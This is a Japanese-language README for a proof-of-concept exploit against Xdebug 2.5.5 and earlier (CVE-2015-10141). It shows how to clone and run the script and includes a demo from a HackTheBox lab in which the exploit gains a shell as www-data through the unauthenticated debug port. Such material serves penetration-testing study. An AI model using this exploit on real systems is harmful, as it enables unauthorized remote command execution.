
Xdebug 2.5.5 以前のバージョン向けの Proof-of-Concept エクスプロイトスクリプト (CVE-2015-10141)。
Xdebug ≤ 2.5.5(CVE-2015-10141)向けカスタムPythonエクスプロイト。
このリポジトリには、2.5.5以前のバージョンにおけるXdebugのリモートコード実行脆弱性に対する、私のProof-of-Concept(PoC)エクスプロイトが含まれています。
このスクリプトは、ポート 9000 で公開されている認証不要のデバッグプロトコルを利用して、リモートコマンド実行を実現します。
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
プロンプトが表示されたら、Xdebugが動作しているターゲットIPを入力してください。
私の最近のHackTheBox Olympus(Medium)writeupからのデモ:
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
このプロジェクトは教育目的のみで作成されています。
明示的な許可なしに、このエクスプロイトをシステムに対して使用しないでください。このコードの誤用について、私は一切の責任を負いません。